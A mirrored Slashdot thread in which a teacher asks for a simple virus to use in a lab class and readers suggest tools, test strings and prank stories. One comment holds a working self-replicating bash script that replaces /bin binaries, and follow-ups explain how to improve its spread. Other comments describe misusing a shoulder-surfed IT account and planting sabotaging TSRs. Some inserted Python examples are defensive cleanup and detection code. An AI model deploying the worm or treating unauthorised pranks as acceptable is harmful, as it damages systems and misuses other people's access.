Slashdot Mirror


Simple Virus For Teaching?

ed1023 writes "Currently I am teaching a 101 class on computers. It is more of a 'demystifying the black box' type of class. The current topic is computer viruses; I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions? Is there an executable out there that would work, or do I try to write one myself, or is there one that is written that I can compile myself?"

366 comments

  1. Obligatory by Anonymous Coward · · Score: 0

    Well, they're probably infected with one, and you can pass out Live CDs for removal of it.

    1. Re:Obligatory by cbiltcliffe · · Score: 1

      While Live CDs are the best way to remove a lot of viruses, and the only way to remove some, you're just being a dork.

      I know, I know....AC and all....

      But, instead of doing this pointless crap to get FRSTSOYSPOSGSTTPTT, why don't you do something useful.

      Like, maybe point the poster to something that could be exactly what they're looking for:

      http://www.bo2k.com/software/index.html
      BackOrifice 2000.

      Remote control/administration tool, which can be used for all sorts of perfectly legitimate things, or be totally nefarious.
      It's also open source, modular, and the client control console will run on Linux.

      What more could he want?

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    2. Re:Obligatory by hairyfeet · · Score: 4, Insightful

      Yeah but the odds of running into BO in real life is slim to none, so if you are gonna teach them about bugs, why not something useful? I'd suggest one of the Rogue AV or security tool variants. Those infections are as common as dirt, being in the PC fixit biz I should know, and removal involves all the classics...F8 boot into safe mode, deleting the reg keys, then running a nice CD or USB key scanner (I'd of course recommend CD, as it is cheap and easy). Hell you can have them make their own AV Rescue Disc which then they can take home with them, and is a nice tool to have.

      So I guess the real question is if this is gonna be a BS class, where you teach them something that the odds are virtually zipola of running into IRL, or give them a nice overview of how to DIY fixit work? Because while the Security Tool variants freak out the users they are actually pretty damned easy to kill once you know what you are looking for, and pretty much any bug short of a rootkit follows the SOP bugs like Security Tool use. IMHO it would be a good all around lesson, and as long as the machines aren't on the net not a threat. As a bonus you would give them an up close and personal glimpse at how scareware works, which sadly is becoming QUITE popular for malware writers. By knowing the signs and being able to spot the phonies they can actually help their less clueless relatives and be safer themselves.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    3. Re:Obligatory by cbiltcliffe · · Score: 1

      and pretty much any bug short of a rootkit follows the SOP bugs like Security Tool use.

      Might want to check your methods, there.
      Last several installs of SecurityTool I've seen included a rootkit.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    4. Re:Obligatory by upside · · Score: 1

      Not a virus.

      --
      I'm sorry if I haven't offended anyone
    5. Re:Obligatory by Anonymous Coward · · Score: 0

      Thanks! I frequently use compact disks to access binary software code and a range of other electronic files on my personal desktop computing workstation, so I anticipate the link you provided will be very helpful.

      See you around here!

    6. Re:Obligatory by Short+Circuit · · Score: 1

      Yeah but the odds of running into BO in real life is slim to none

      You've never actually been in a college computer lab, have you? I worked in one for five years, and sometimes I still think I pick up a whiff.

    7. Re:Obligatory by davidshewitt · · Score: 1

      removal involves all the classics...F8 boot into safe mode, deleting the reg keys, then running a nice CD or USB key scanner

      A good practice when encountering an infected machine is to back up all of the data and then reinstall the operating system. You don't know what code the virus contained, and some viruses/rootkits can be very good at making copies of themselves and hiding themselves very carefully. Also, virus scanners cannot detect all viruses because a virus can be new enough to not be in the definitions list (especially a problem for a CD scanner). While you do make the point that some of these viruses (the non-rootkit types) are trivial to remove, it's a good idea to be safe and nuke the machine, despite that process being a pain in the ass. You really don't know for sure what the virus has done to the infected machine.

    8. Re:Obligatory by codeguy007 · · Score: 1

      Backing up first is always best. However reinstalling should only be a last resort. With the right software, you should be able to find and remove all viruses in a lot less time than reinstalling. If you come across something that you just can't remove then reinstall. Also before restoring the backup make sure you scan the files.

  2. What OS? And how annoying? by canyon289 · · Score: 3, Informative

    What OS are you running? You could create a simple bat script that pops up an annoying message every 20 or 30 minutes to show your students an "infected" machine.

    1. Re:What OS? And how annoying? by celardore · · Score: 2, Interesting

      That reminds me of something I did when I was a bit younger. I was leaving the company that day anyway, and some dude had been bugging me for months. At some time previous I'd shoulder-surfed the IT department's "test" account, which I logged onto on an unused PC in the office. I created a simple .bat file

      start:
      net send annoyingguy "message i wanted"
      goto start:

      Or something along that vein. I can't remember exactly how I made it work, but possibly by leaving the PC on, monitor off, when I left work the last time.
      The boss knew the people I went to work for so it didn't end well for me, but looking back it was incredibly funny and the couple weeks out of employment turned out to be very beneficial to my career in the long run.

      I heard a couple months later from some old co-workers that it took IT about two days to figure out and in the meantime, old matey's account was unusable.

      Live and learn I guess. Was still funny, and incredibly basic.

    2. Re:What OS? And how annoying? by tibit · · Score: 1, Troll

      Two days to run wireshark? LOL.

      --
      A successful API design takes a mixture of software design and pedagogy.
    3. Re:What OS? And how annoying? by crisco · · Score: 5, Informative
      Back in the late 80s we had a bunch of 10MHz XT clones in a computer lab networked together using Novell and 10BASE2 or maybe even TokenRing. Some of the games we had ran timing loops for the original 4.77 MHz PC so we had some simple TSR that sat on the interrupt timer and ran some NOPs to slow the computers down. I thought it would be a funny prank to add this to the AUTOEXEC.BAT file on most of the boot floppies in the lab, sadly I didn't test it on more than one computer.

      The interrupts and NOPs interfered greatly with the network cards, causing the whole thing to come crashing down when more than a couple of the computers were running at a time. It took at least a couple of days for the sysadmin to sort it out.

      RIP George, thanks for introducing me to the Internet and I'm sorry that you didn't get to stick around for Linux and /. I should have taken your Minix class when I had the chance.

      --

      Bleh!

    4. Re:What OS? And how annoying? by Some1too · · Score: 1
      I had some mod points but I'll waive using them to tell this funny story:

      I worked at a head office for a large oil and gas company in their call centre. One day a net send message popped up on all the computer screens in the office: (I've changed the wording to protect the guilty) "I'm XXX and I like licorice".

      I laughed to myself, clicked ok to the message and then suddenly the phones began to ring off the hook. The amount of callers waiting on hold kept increasing to unimaginable numbers. A few minutes later one of our second level guys walked in and we asked him to sit down and help us with the call volumes due to some idiot who had sent a net send message to the complete company (50 floors of employees).

      The guy turned completely red, sat down and started taking calls after calls. It was then that we immediately knew who the guilty party was. He wanted to send a net send message to one of the other tech guys in the building but had sent it to the whole domain instead.

      Needless to say he was known as the licorice guy from there on out.

      I've always wondered if he stopped using net send....

      Some1too

    5. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      A story that has played out countless times at countless companies. I've witnessed it twice in different companies (different decades even) myself.

    6. Re:What OS? And how annoying? by Anonymous Coward · · Score: 1, Informative

      Even worse; two days to go to the "victim's" computer and type "net stop messenger". If it really took two days, they weren't the sharpest IT folks around. Of course, it sounds apocryphal because the messenger service only shows 1 dialog at a time so a user can position it off to one side of the screen and leave it there and not get bothered. I guess this was a long time back, because modern versions of Windows don't have the messenger service enabled anyway.

    7. Re:What OS? And how annoying? by Nikker · · Score: 1

      Ha! I did something similar but during the first week of my first job after graduation. One of the IT staff was tracking down or attempting to track down an ip and find the hardware. I used the same command to send the pc a message so we could track it down. Feeling cool about everything I started sending "floppy drive on fire" messages to co-workers, little did I know the entire coast to coast operation was running in the same domain so "net send * 'floppy drive on fire'" sent to every office and warehouse from Vancouver BC to New Brunswick. Lucky for me I was in the head office and the senior guys got a kick out of it. Next day IT came to my machine and told me I had a virus. I got most of the day off to get a coffee. Those were the days.

      --
      A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
    8. Re:What OS? And how annoying? by insufflate10mg · · Score: 1

      The submitter should use something like Visual Basic (6.0 or .NET, whichever is more suitable for the OS) to program a custom "virus" that can do whatever he wants it to do. After giving them several tips and letting them attempt to diagnose/fix it, he can simply tell the students exactly how to disable it from doing what it does (pop-ups, file deletion, keyboard hooks, phoning home, etc). It's exactly what I would do and it would provide the students with a great hands-on learning experience.

    9. Re:What OS? And how annoying? by KevMar · · Score: 1

      When I was in high school we had a pre-windows PC lab of 15-20 computers and a Mac lab of 12-14 computers. One day I returned to the PC lab at the end of the day for something and I saw the PC teacher and the Mac teacher sitting at a computer. They called me over to them asking if I knew anything about this.

      They told me this computer had a virus and it had my name on it. As soon as they said that, I remembered what I did. I did a net send to all the computers in the PC lab with the message "This is a virus" earlier in the day. They were not happy with me at the time and it took a bit of work for me to explain that it was not a virus, just a message saying it was a virus.

      --
      Im a gamer, not a grammer major. This post is full of spelling and grammer mistakes.
    10. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      This. It would take less than 30 lines of code to do everything he mentioned -- ridiculously simple.

    11. Re:What OS? And how annoying? by Hojima · · Score: 1

      What OS are you running?

      This is very important, because if you use a Mac you can't get a virus on it. /joke

    12. Re:What OS? And how annoying? by arth1 · · Score: 3, Interesting

      If Linux (or similar), here's an example of a worm that spreads itself on the local host whenever executed as root:

      #!/bin/bash
       
      if [ -O /bin/su ]; then
        mkdir -p /bin/.infected
        TARGET="/bin/ls"
        if [ -e /bin/.infected/ls ]; then
          TARGET=$(for i in $(find /bin -type f -prune); do
            echo 0$RANDOM $i
          done | sort | head -1 | cut -d' ' -f2-)
        fi
        if [ ! -e /bin/.infected/$(basename $TARGET) ]; then
          mv $TARGET /bin/.infected/
          cp $0 $TARGET
        fi
      fi
      ME="$(basename $0)"
      if [ -x /bin/.infected/$ME ]; then
        PATH=/bin/.infected:$PATH
        $ME $*
        if [ $RANDOM -gt 30000 ]; then
          echo "Something wonderful has happened ... your machine is alive"
        fi
      fi

      Save as "virus"
      chmod +x virus ./virus
      rm -f virus
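Added example, not part of the comment above or of anyone's post in this thread: a cleanup audit for the layout that script leaves behind (originals moved into a `.infected` directory, a copy of the script left under each original name), which is the by-hand removal the submitter asks about. The function names `audit`, `restore` and `build_sample` and all sample file contents are constructed for illustration; it works on a directory you pass in and the demo uses a scratch directory, not the real /bin.

```python
"""Audit and undo the /bin/.infected stash described in the comment above."""
import os
import tempfile
from pathlib import Path

STASH = ".infected"  # stash directory name taken from the posted script


def audit(bin_dir):
    """Map each stashed original to the state of the file now using its name."""
    bin_dir = Path(bin_dir)
    stash = bin_dir / STASH
    report = {}
    if not stash.is_dir():
        return report
    for original in sorted(stash.iterdir()):
        current = bin_dir / original.name
        if not current.exists():
            # The original was moved away but nothing was copied in its place.
            report[original.name] = "missing"
            continue
        head = current.read_bytes()[:65536]
        if head.startswith(b"#!") and STASH.encode() in head:
            report[original.name] = "replaced"    # a script copy holds the name
        else:
            report[original.name] = "unexpected"  # review by hand, do not overwrite
    return report


def restore(bin_dir):
    """Move originals back over confirmed script copies; return names restored."""
    bin_dir = Path(bin_dir)
    stash = bin_dir / STASH
    restored = []
    for name, state in audit(bin_dir).items():
        if state in ("replaced", "missing"):
            # A rename keeps the original's own mode and ownership.
            os.replace(stash / name, bin_dir / name)
            restored.append(name)
    # Remove the stash only when nothing is left in it for manual review.
    if stash.is_dir() and not any(stash.iterdir()):
        stash.rmdir()
    return restored


def build_sample(root):
    """Constructed lab layout in a scratch directory (never the real /bin)."""
    bin_dir = Path(root) / "bin"
    (bin_dir / STASH).mkdir(parents=True)
    stub = (b"#!/bin/bash\n# constructed stand-in for the script copy\n"
            b"PATH=/bin/.infected:$PATH\n")
    (bin_dir / STASH / "ls").write_bytes(b"\x7fELF original ls")
    (bin_dir / "ls").write_bytes(stub)                       # replaced
    (bin_dir / STASH / "cp").write_bytes(b"\x7fELF original cp")   # missing
    (bin_dir / STASH / "cat").write_bytes(b"\x7fELF original cat")
    (bin_dir / "cat").write_bytes(b"\x7fELF something else")  # unexpected
    return bin_dir


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        lab = build_sample(tmp)
        print("before :", audit(lab))
        print("restored:", restore(lab))
        print("after  :", audit(lab))
```

Anything reported as "unexpected" stays in the stash so a person can compare both files before deciding which one belongs under that name.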

    13. Re:What OS? And how annoying? by Power_Pentode · · Score: 1

      I'll admit it. About 10-15 years ago I did the same thing from a QA domain to the corporate domain, thinking that the domain arg was a qualifier for net send. The intended recipient got my message requesting assistance, along with about 150 other people. Sadly, the only person who contacted me was a marketroid who rang me up and asked what he could do to help. I'm no longer quite so quick to stereotype people.

    14. Re:What OS? And how annoying? by arth1 · · Score: 4, Funny

      Windows IT guys can be clueless. In a previous job, IT insisted on shutting down my machine and taking it away for cleaning because I saved the EICAR test string in cygwin so I could test my Unix boxes' clamav with it. There was no convincing them that the string "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" wasn't a virus.
      Not even my creds as the author of the world's first heuristic AV scanner, nor my certifications were believed, because Symantec Antivirus claimed it was a virus, so it had to be.

      That IT's internal HP printers' LCD panels suddenly started displaying "INSERT COIN" had nothing to do with this, I swear.

    15. Re:What OS? And how annoying? by gagol · · Score: 1
      I can remember two events in my early teen computer life:

      1. My first computer class in high school involved programming in logo writer. I asked the teacher how to program sound and he told me it was impossible. I did a little experimentation and found how it worked and created a high pitched beep (15KHz) that lasted too long for the teacher's taste.

      2. One of my sucker "friends" found one day a floppy disk in his street that contained a "Dragonball pictures downloader", in fact I created it with my friend in VB and it deleted random files in his Windows and Program Files folder, of course the close button did not work. The trick did not work, as he continued to speak with us afterwards...

      --
      Tomorrow is another day...
    16. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      In high school we were in an after school computer club, and we were bored and spamming net send *'s to each other basically trying to overwhelm others, we did this for all of 3 minutes. Since it was after school and we were the only people in the computer lab, we really didn't see the harm in it. Unfortunately, every computer in the school got the spam messages. Since it was after school, only a few teachers and offices got interrupted we didn't really get in trouble but got very stern warnings about messing around like that.

    17. Re:What OS? And how annoying? by xandercash · · Score: 3, Informative

      I'm having a similar problem right now. An app I'm working on which does some low level socket networking keeps being flagged by Symantec's active scan as a virus. I'm not sure why, yet, but IT keeps telling me my computer is infected (as discovered by their nightly scans). I've explained more than once that it's an innocuous program that I wrote myself, and have assured them many times that it is NOT a virus. But they believe Symantec over me. It's VERY annoying when I compile the app and Symantec decides to delete it an hour later. Or when it's running and suddenly stops because Symantec suspended the process. It was funny the first time. (where'd the exe go? I know it was here somewhere...) but it's gotten quite tiresome. Then there's the OTHER conversation. "Why did you disable your antivirus? That's against company policy" "It keeps flagging my project as a virus" "Well, then don't write a virus...."

    18. Re:What OS? And how annoying? by arogier · · Score: 1

      What about picking up some old system 7 Macs and nVir? This should hopefully pose a low risk for the rest of the school.

    19. Re:What OS? And how annoying? by bennomatic · · Score: 1

      A friend of mine was working in a PR firm some years back, and he was probably the techiest of all of them, including the IT team. They were using Lotus Notes, and he found that he could script links in emails that he sent. This allowed him to send an email to someone that told them to check out an attachment, and when they clicked on it, it looked like nothing happened, but it would actually be sending out an email that he had scripted from their account. He had a few weeks of playing around with it, laughing at all the consternation about people receiving emails that the senders swore they hadn't sent--often many copies--before he decided that he'd better stop before he got caught.

      The one I remember was that he had one of his colleagues email the CEO of the company something like, "Jim (not his real name), Chicken pot pie, chicken pot pie, chicken. Chicken pot pie, chicken pot pie, chicken." Since the attachment didn't work, the colleague clicked it 50 times, but didn't make the connection when Jim complained to her that she'd sent him 50 meaningless emails.

      --
      The CB App. What's your 20?
    20. Re:What OS? And how annoying? by cgenman · · Score: 1

      Does it even need to be an OS virus? A word macro virus can be an inherently sandboxed virus that is easy to see, understand, and clean.

      How technical is this computing 101?

    21. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      What OS are you running? You could create a simple bat script that pops up an annoying message every 20 or 30 minutes to show your students an "infected" machine.

      Not a good first question.

      First Question: How old are the students? If they are kids (gradeschool, jr high, high school, etc.) then it's a bad idea to start with and you shouldn't bother going any further. If they're adults, you can proceed but this probably isn't something you should do in a basic class.

      So here's what I recommend, since it's probably illegal to develop your own malware. Get a single computer, like a used one from a pawn shop but make sure it's CHEAP. Paint it red or put a jolly roger on it and set up bright signs that tell people to not Fuck Around. Install an insecure OS such as Windows, Mac OS, or Linux***, and then do what you can to further open them up (disable firewalls, use weak passwords for admin/root accounts, turn on remote services, share files/folders, etc.) Disable USB ports (use old-style keyboard/mouse connectors) so that nobody puts a jump drive on the system. Make sure there is no CD/DVD burner but just a read only CD/DVD drive. Now start browsing the web. Use Internet Explorer or Safari if possible, those are the two most vulnerable browsers right now *** and make sure things like link scanning and other 'safe surf' options are turned off. Go to some porn sites. Click on ALL the popups. Accept everything. Allow everything. Eventually you will get infected with a variety of malware. Once this happens, be sure to remove your network cable so you don't end up being a spam/virus redistribution box. Do NOT leave the box running unless you are in the room. At the end of the day the system should be powered down, rebooted via a known clean boot CD/DVD, and then wipe the drive to nothing. Do NOT leave the box installed or usable in any fashion.

      And good luck. If you're not very, very careful while doing this, you'll need it while looking for your next job.

      *** term 'insecure' based on OS performance during annual pwn2own contest. Argue with the guy who hacked all 3 OS's about how secure they are, TYVM.

    22. Re:What OS? And how annoying? by upside · · Score: 1

      A bat script is not a virus. I take it he wants a virus or a worm; something that infects a machine, not something he installs.

      --
      I'm sorry if I haven't offended anyone
    23. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      net send * "lolol"

      was sooooo much better.

    24. Re:What OS? And how annoying? by ArsenneLupin · · Score: 1

      Two days to run wireshark? LOL.

      It was a Windows shop.

    25. Re:What OS? And how annoying? by ArsenneLupin · · Score: 5, Interesting
      Another fun prank from the DOS days: A TSR program that hooked in the keyboard interrupt, and if it detected that it was called from Turbo Pascal, and that the sequence for compilation was called, it would locate the editor buffer and randomly change a couple of semicolons to colon.

      This was both annoying as hell (plenty of syntax errors), and difficult to positively blame on mischief as:

      • Colon and semicolon are on same key, so easy to blame on typo (phat phingered the shift key)
      • On those crappy monitors that we used back then, it was really difficult to tell colon and semicolon apart

      The TSR was called <shift-space>.com and so a cursory perusal of the autoexec.bat would not reveal its presence, as shift-space just looks like a normal space (... but can be the name of a command)

      IT spent an entire day trying to re-install Turbo Pascal, and the problem still persisted... (because it was in an independent TSR, not in the Turbo Pascal app itself)

      Then, the next day, re-install of the entire system.

      Another fun TSR one was the annoying keyboard beep. The TSR had a timetable of the classes built in, so that the keyboard click would be very short and almost unnoticeable at the beginning of the class, and then gradually grew longer and longer during the class (first a faint click, then a more obvious click, and by the end of the hour an annoying beeeeeeeeeep). Fun thing is, as it was gradual, nobody really noticed when/how it started, but eventually that background noise was "just there"...

      Ah, those were the days of highschool pranks...

    26. Re:What OS? And how annoying? by CoolVibe · · Score: 1

      Hey! Don't shoot the messenger! :)

    27. Re:What OS? And how annoying? by lewko · · Score: 3, Funny

      It looks like you're writing a joke.

      Would you like help?

      --
      Do you or your partner snore? - Visit www.snoring.com.au
    28. Re:What OS? And how annoying? by lewko · · Score: 4, Funny

      Not computer related, but similar.

      A friend of mine carried a pager years ago. I wrote a script to send a message to his pager every morning at 3am, saying "Low Battery".

      --
      Do you or your partner snore? - Visit www.snoring.com.au
    29. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      Well, if you're running Windows, you already have a big kick ass virus to show them!

    30. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      Why are you creating something like this on a network connected, production PC to begin with? If you're smarter than us "clueless Windows IT guys" then you should know that in a corporate or government environment, no matter what, if the AV says something is there, the PC gets re-imaged. No exceptions. At least in every environment that I've managed.

      If you are authorized to do this then you should have a segregated test machine.

    31. Re:What OS? And how annoying? by lorg · · Score: 1

      mmmm ... virus nostalgia. Wonderful SCA reference you managed to squeeze in there.

    32. Re:What OS? And how annoying? by dawich · · Score: 1

      That IT's internal HP printers' LCD panels suddenly started displaying "INSERT COIN" had nothing to do with this, I swear.

      Ah, playing with LaserJet front panels... Making them talk to the person standing at the printer...

    33. Re:What OS? And how annoying? by operagost · · Score: 1

      The payload probably isn't as important as the means of propagation, or the other elements such as polymorphism.

      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
    34. Re:What OS? And how annoying? by Just+Some+Guy · · Score: 1

      cp $0 $TARGET

      Note that if [ $TARGET = "cp" ], you'll have some explaining to do at this point.

      --
      Dewey, what part of this looks like authorities should be involved?
    35. Re:What OS? And how annoying? by Anonymous Coward · · Score: 1, Funny

      I decided to change the printer LCD panels to say "RADIATION LEAK" at my last job. It turns out we shared the printers with the sales staff. My boss thought it was funny as hell when a sales guy wandered into his office to complain about the printer leaking radiation.

    36. Re:What OS? And how annoying? by Quirkz · · Score: 1
      Similar to your story, in the very old Macs it was trivial to replace the startup screen with an image of your choice by giving it the right name and putting it in the right place. One day I whipped up a little bomb picture (similar to the normal Mac has crashed error message that any Mac user should have recognized) and a silly message saying "this system will self destruct in 10 seconds." I put this image on one of the computers in the journalism lab, thinking the other students would get a kick out of it when they started the computer up in the morning.

      As luck would have it, that day a secretary from one of the other departments needed to type something up first thing that morning and picked that very computer. Not particularly savvy and not used to Macs, she saw the message and flipped out.

      Thankfully the journalism teacher knew what was going on, assured her everything was fine, and quickly figured out I was behind it. He didn't get too mad, but did make me take the picture off before anyone else got to see it.

    37. Re:What OS? And how annoying? by arth1 · · Score: 1

      Note that if [ $TARGET = "cp" ], you'll have some explaining to do at this point.

      That one is easily fixed by moving the "PATH=/bin/.infected:$PATH" stanza to the top of the script, so if cp has been moved, it will still be found. A side benefit(?) is to slow the rate of infection.

    38. Re:What OS? And how annoying? by arth1 · · Score: 1

      A segregated test machine wouldn't have access to the Unix boxes I admin, so your suggestion is, in typical IT fashion, completely useless.

      No, the problem here is that someone who hasn't even heard of AV test strings or understands the first thing about false positives[*] shouldn't be allowed to run and install AV software on other people's machines, and much less make decisions about those machines. For one thing, it means that they haven't even tested their AV software themselves, and installed untested software on the corporate network. In my opinion, that should be reason enough for disciplinary action.

      [*]: In this case a deliberately false positive. Which Symantec even tells you if you bother to follow the link it throws up for EICAR test string when it encounters it.

    39. Re:What OS? And how annoying? by Coren22 · · Score: 1

      Yeah, so? It would take me 5 minutes to track this down, and I work in a "Windows Shop"

      --
      APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
    40. Re:What OS? And how annoying? by tibit · · Score: 1

      I have no clue why would anyone consider this a troll post. Outrageous, unbounded incompetency -- yes, it deserves a LOL at best. Some "IT" department that was. Gimme a break.

      --
      A successful API design takes a mixture of software design and pedagogy.
    41. Re:What OS? And how annoying? by tibit · · Score: 1

      It just gets better and better. Like reading a TDWTF thread. FYI: Wireshark runs on Windows. IIRC it has been running on Windows back when it wasn't even called Wireshark...

      --
      A successful API design takes a mixture of software design and pedagogy.
    42. Re:What OS? And how annoying? by Anonymous Coward · · Score: 0

      I created a very simple "virus" in QuickBasic once... just for the heck of it.

      What I did, was simply to create and delete an empty file on the HD, so the LED blinked..... then of course it was a matter of timing the text output so it read "format drive c: % complete" (where incremented every 5 seconds or thereabouts). I showed it to my teacher, and he said I should try and fool one or two of the less computer literate guys with it....

      My GOODNESS they panicked :lol

    43. Re:What OS? And how annoying? by fallungus · · Score: 1

      Something basic, a "Fuck you, World" application.

      --
      You call this a sig?
    44. Re:What OS? And how annoying? by zill · · Score: 1

      GEORGE! After all these years your tongue finally slipped!

    45. Re:What OS? And how annoying? by zill · · Score: 1

      For some reason I read your comment in Chris Hansen's voice...

    46. Re:What OS? And how annoying? by uninformedLuddite · · Score: 1

      Hex editing command.com to reply with funny messages was always entertaining.

      --
      The new right fascists are bilingual. They speak English and Bullshit.
  3. Stuxnet by Anonymous Coward · · Score: 1, Funny

    Simple worm for beginners!

    1. Re:Stuxnet by flappinbooger · · Score: 1

      I vote cybergate rat or similar, built to not inject or hide. Other "viruses" are too nasty nowadays (think virut ...), unless you get ahold of a copy of one of the EARLY fake A/V's, as in earlier this year or last year.

      Otherwise the teacher of this class will have next week's lesson "how to re-image a room full of computers".

      A fake A/V isn't too hard to harvest.

      --
      Flappinbooger isn't my real name
  4. Sure by Peach+Rings · · Score: 3, Funny

    Here, let me link you to an executable file so you can download it and run it on an entire lab of computers. It's safe, don't worry.

    1. Re:Sure by pinkushun · · Score: 1

      Dear Sir / Madams.

      I am a big fan of your soft wares, please send me your banking details so I can deposit you your payment.

      signed
      - viker bandin

  5. EICAR by Anonymous Coward · · Score: 5, Informative

    http://en.wikipedia.org/wiki/EICAR_test_file

    1. Re:EICAR by Anonymous Coward · · Score: 0

      He wants a live virus to train removal from the system, not a dummy virus to test the AV software.

    2. Re:EICAR by timothyf · · Score: 4, Insightful

      Then he's pretty stupid for wanting that. This'll look exactly the same as a real virus, and it will be easy to clean off, but it won't propagate or do nasty things like a real virus. For a computers 101 class, anything more than something like this is just asking for trouble.

    3. Re:EICAR by timothyf · · Score: 1

      Sorry, exactly the same as a real virus to scanning software.

    4. Re:EICAR by moonbender · · Score: 3, Interesting

      The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.

      Wow, that's pretty cool. Here's the string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

      --
      Switch back to Slashdot's D1 system.
    5. Re:EICAR by rpresser · · Score: 5, Funny

      Thanks, dude. My virus scanner just started complaining about my browser cache.

    6. Re:EICAR by budgenator · · Score: 1

      That might be an interesting comment string inside a jpeg.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
    7. Re:EICAR by Anonymous Coward · · Score: 0

      Ok then, write a bat file that deletes a few files, makes a few registry entries and run it? Call it the "lab_training_virus". I don't understand what having a real virus actually infecting the computer is going to give in training value. Simulate the results of one and you can do the same thing. You have two ways to remove a virus, an automated solution from antivir software or you do it manually based on what it infects. Neither is of any value to a trainee because one is automated (training value is run a scan and watch the software clean it) and the other is very specific to the virus and what it does and only requires basic windows skills to remove, not some keen ninja antivirus removing skillz..

    8. Re:EICAR by JWSmythe · · Score: 2, Funny

          I was surprised this didn't have the "What could possibly go wrong" tag. :)

          Note in the question he did say "... do I try to write one my self ...". I've seen quite a few reports where someone wrote a proof of concept virus that was just a bit more virile than they thought, and it ended up everywhere. It'll lead to that "Oops, I thought I prevented it from doing ..." This is fun, we get a front row seat to someone making a complete ass out of themselves. I hope it doesn't cause too much trouble..

      --
      Serious? Seriousness is well above my pay grade.
    9. Re:EICAR by SQLGuru · · Score: 1

      I'm pretty sure you can find the Melissa virus around somewhere. Mostly benign. http://support.microsoft.com/kb/224567

      Not overly difficult to remove. Isolated to Word. Doesn't do perm. damage.

    10. Re:EICAR by arth1 · · Score: 1

      Thanks, dude. My virus scanner just started complaining about my browser cache.

      No, it didn't, because that is only to be detected as a virus if it's a file by itself.
      However, this might trigger on the most paranoid virus killers:

      begin 755 eicar.com
      M6#5/(5`E0$%06S1<4%I8-30H4%XI-T-#*3=])$5)0T%2+5-404Y$05)$+4%.
      85$E625)54RU415-4+49)3$4A)$@K2"H*
      `
      end
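
The "only if it's a file by itself" rule discussed in the comments above, as an added example that is not part of any comment in the thread. It checks the quoted 68-byte string against the whitespace and 128-byte limits from EICAR's published description of the test file (those limits are not stated on this page), and decodes the uuencoded block as posted; the function names and sample inputs are constructed for illustration.

```python
import binascii

# The 68-byte test string quoted in the thread, split in two so this source
# file does not contain it as one contiguous run.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR" + rb"-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

MAX_LEN = 128                       # total file length limit (EICAR description)
ALLOWED_TRAILING = b" \t\n\r\x1a"   # space, tab, LF, CR, Ctrl-Z

# The uuencoded block exactly as posted in the thread (indentation removed).
UU_POST = "\n".join([
    'begin 755 eicar.com',
    'M6#5/(5`E0$%06S1<4%I8-30H4%XI-T-#*3=])$5)0T%2+5-404Y$05)$+4%.',
    '85$E625)54RU415-4+49)3$4A)$@K2"H*',
    '`',
    'end',
])


def is_eicar_test_file(data: bytes) -> bool:
    """True only if the whole file qualifies as the EICAR test file."""
    if not data.startswith(EICAR):
        return False                # string must be at offset 0
    if len(data) > MAX_LEN:
        return False                # too much padding
    return all(b in ALLOWED_TRAILING for b in data[len(EICAR):])


def contains_eicar_anywhere(data: bytes) -> bool:
    """What an over-eager scanner matches: the string at any offset."""
    return EICAR in data


def decode_uu(text: str) -> bytes:
    """Decode the body lines between 'begin' and 'end' of a uuencoded post."""
    out = bytearray()
    in_body = False
    for line in text.splitlines():
        if line.startswith("begin "):
            in_body = True
        elif line == "end":
            break
        elif in_body and line and line != "`":   # "`" is the empty last line
            out += binascii.a2b_uu(line.encode("ascii"))
    return bytes(out)


def build_samples() -> dict:
    """Constructed sample files covering the cases raised in the thread."""
    return {
        "bare_68": EICAR,
        "crlf_70": EICAR + b"\r\n",
        "uu_post": decode_uu(UU_POST),
        "html_cache": b"<html><body>Here's the string: " + EICAR + b"</body></html>",
        "trailing_text": EICAR + b" appended",
        "padded_128": EICAR + b" " * 60,
        "padded_129": EICAR + b" " * 61,
    }


def verdicts() -> dict:
    """Map sample name -> (strict whole-file match, substring match)."""
    return {name: (is_eicar_test_file(d), contains_eicar_anywhere(d))
            for name, d in build_samples().items()}


if __name__ == "__main__":
    for name, (strict, loose) in verdicts().items():
        print(f"{name:14} strict={strict!s:5} substring={loose}")
```

A cached copy of this page is the `html_cache` case: the string is present but not at offset 0, so only a scanner doing substring matching would flag it.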

    11. Re:EICAR by yuna49 · · Score: 4, Informative

      EICAR is detected by all AV products including ClamAV.

      I'd put it in a zip file, then attach the zip to an email message. Show how real viruses propagate by mail. How about putting a copy on a USB pendrive then running eicar.com from Autostart? Any Windows AV product with a decent autoscanner should detect both of these and pop up a warning.

      If you want to get really fancy you can set up a Linux box running MailScanner with ClamAV and send an "EICAR-infected" e-mail message through it. You'll see MailScanner detect the virus, put it in a quarantine, and send notices to the admin and, optionally, the sender.

      For a lay audience I think it's more important to stress the vectors than to concentrate on the payload itself.

